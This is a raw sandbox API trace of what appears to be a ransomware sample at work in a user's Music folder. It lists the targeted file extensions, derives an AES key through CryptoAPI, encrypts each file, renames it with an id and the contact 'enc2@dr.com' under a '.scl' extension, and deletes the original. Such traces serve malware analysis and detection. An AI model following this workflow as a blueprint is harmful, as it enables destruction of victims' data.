	[0190.861] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0190.862] WriteFile (in: hFile=0x388, lpBuffer=0xfdb348*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfdb348*, lpNumberOfBytesWritten=0x18b358*=0xbe0, lpOverlapped=0x0) returned 1
	[0190.865] CloseHandle (hObject=0x388) returned 1
	[0190.865] CloseHandle (hObject=0x2c0) returned 1
	[0190.865] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a")) returned 1
	[0190.869] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ck0z.m4a")) returned 0
	[0190.869] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69432380, ftCreationTime.dwHighDateTime=0x1d974c4, ftLastAccessTime.dwLowDateTime=0x5c06fc00, ftLastAccessTime.dwHighDateTime=0x1d9752d, ftLastWriteTime.dwLowDateTime=0x5c06fc00, ftLastWriteTime.dwHighDateTime=0x1d9752d, nFileSizeHigh=0x0, nFileSizeLow=0x7142, dwReserved0=0x0, dwReserved1=0x0, cFileName="GNAsYnz.wav", cAlternateFileName="")) returned 1
	[0190.869] lstrcmpW (lpString1="GNAsYnz.wav", lpString2="..") returned 1
	[0190.869] lstrcmpW (lpString1="GNAsYnz.wav", lpString2=".") returned 1
	[0190.869] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\"
	[0190.869] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\", lpString2="GNAsYnz.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\GNAsYnz.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\GNAsYnz.wav"
	[0190.869] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\GNAsYnz.wav") returned 50
	[0190.869] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.870] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\GNAsYnz.wav", cchLength=0x32 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav") returned 0x32
	[0190.870] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.870] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.870] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav"
	[0190.870] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav") returned 50
	[0190.870] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.871] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.871] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0190.871] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.871] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0190.871] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.871] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.871] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0190.875] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x7142, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x7142, lpOverlapped=0x0) returned 1
	[0190.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.880] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb770) returned 1
	[0190.882] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.882] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0190.883] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.883] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0190.883] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.883] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9370) returned 1
	[0190.883] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.883] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x7142, dwBufLen=0x7142 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x7150) returned 1
	[0190.884] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.885] RtlMoveMemory (in: Destination=0xfe42d0, Source=0xfdd180, Length=0x7142 | out: Destination=0xfe42d0) 
	[0190.885] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.885] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe42d0*, pdwDataLen=0x18aefc*=0x7142, dwBufLen=0x7150 | out: pbData=0xfe42d0*, pdwDataLen=0x18aefc*=0x7150) returned 1
	[0190.885] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.886] CryptDestroyKey (hKey=0xfb9370) returned 1
	[0190.886] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.886] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0190.886] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.886] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0190.886] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.887] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.887] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.888] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0190.889] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 92
	[0190.889] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0190.890] WriteFile (in: hFile=0x388, lpBuffer=0xfe42d0*, nNumberOfBytesToWrite=0x7150, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe42d0*, lpNumberOfBytesWritten=0x18b358*=0x7150, lpOverlapped=0x0) returned 1
	[0190.894] CloseHandle (hObject=0x388) returned 1
	[0190.895] CloseHandle (hObject=0x2c0) returned 1
	[0190.895] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav")) returned 1
	[0190.901] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\gnasynz.wav")) returned 0
	[0190.901] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdafd4140, ftCreationTime.dwHighDateTime=0x1d967cc, ftLastAccessTime.dwLowDateTime=0x653283c0, ftLastAccessTime.dwHighDateTime=0x1d975b5, ftLastWriteTime.dwLowDateTime=0x653283c0, ftLastWriteTime.dwHighDateTime=0x1d975b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HXbBqMJvgUE", cAlternateFileName="HXBBQM~1")) returned 1
	[0190.901] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a500d40, ftCreationTime.dwHighDateTime=0x1d9758e, ftLastAccessTime.dwLowDateTime=0xd13e3f90, ftLastAccessTime.dwHighDateTime=0x1d9764c, ftLastWriteTime.dwLowDateTime=0xd13e3f90, ftLastWriteTime.dwHighDateTime=0x1d9764c, nFileSizeHigh=0x0, nFileSizeLow=0x11d82, dwReserved0=0x0, dwReserved1=0x0, cFileName="ibsr-q.wav", cAlternateFileName="")) returned 1
	[0190.901] lstrcmpW (lpString1="ibsr-q.wav", lpString2="..") returned 1
	[0190.901] lstrcmpW (lpString1="ibsr-q.wav", lpString2=".") returned 1
	[0190.901] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\"
	[0190.901] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\", lpString2="ibsr-q.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\ibsr-q.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\ibsr-q.wav"
	[0190.902] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\ibsr-q.wav") returned 49
	[0190.902] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.902] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\ibsr-q.wav", cchLength=0x31 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav") returned 0x31
	[0190.902] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.902] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.902] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav"
